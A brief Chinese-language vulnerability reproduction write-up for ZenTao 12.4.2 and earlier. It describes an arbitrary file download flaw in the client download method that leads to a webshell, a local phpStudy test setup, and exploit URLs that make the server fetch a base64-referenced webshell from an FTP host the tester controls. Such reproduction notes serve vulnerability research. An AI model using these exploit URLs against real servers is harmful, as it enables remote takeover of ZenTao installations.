- 簡介
禪道是第一款國產的開源項目管理軟件,她的核心管理思想基於敏捷方法scrum,內置了產品管理和項目管理,同時又根據國內研發現狀補充了測試管理、計划管理、發布管理、文檔管理、事務管理等功能,在一個軟件中就可以將軟件研發中的需求、任務、bug、用例、計划、發布等要素有序的跟蹤管理起來,完整地覆蓋了項目管理的核心流程。
- 漏洞概述
禪道12.4.2版本存在任意文件下載漏洞,該漏洞是因為client類中download方法中過濾不嚴謹可以使用ftp達成下載文件的目的。且下載文件存儲目錄可解析php文件,造成getshell。 - 影響版本
禪道≤ 12.4.2 - 環境搭建
環境:phpStudy+禪道12.4.2
-
官網下載禪道12.4.2
因為我們要調試代碼,所以下載源碼,不用官方的集成環境,這里我用的是中文版的那個源碼。
https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html
-
源碼安裝
這里有一項不通過,需要修改配置。在phpstudy里面的PHP擴展及設置修改。
-
- 安裝成功
- 漏洞復現
EXP:
http://127.0.0.1/zentao/client-download-1-<base64 encode webshell download link>-1.html
http://127.0.0.1/zentao/data/client/1/<download link filename>
這里需要自己開啟一個ftp服務,然后把鏈接的base64位編碼和自己的路徑替換一下。
http://127.0.0.1/zentaopms/www/client-download-1-<base64 encode webshell download link>-1.html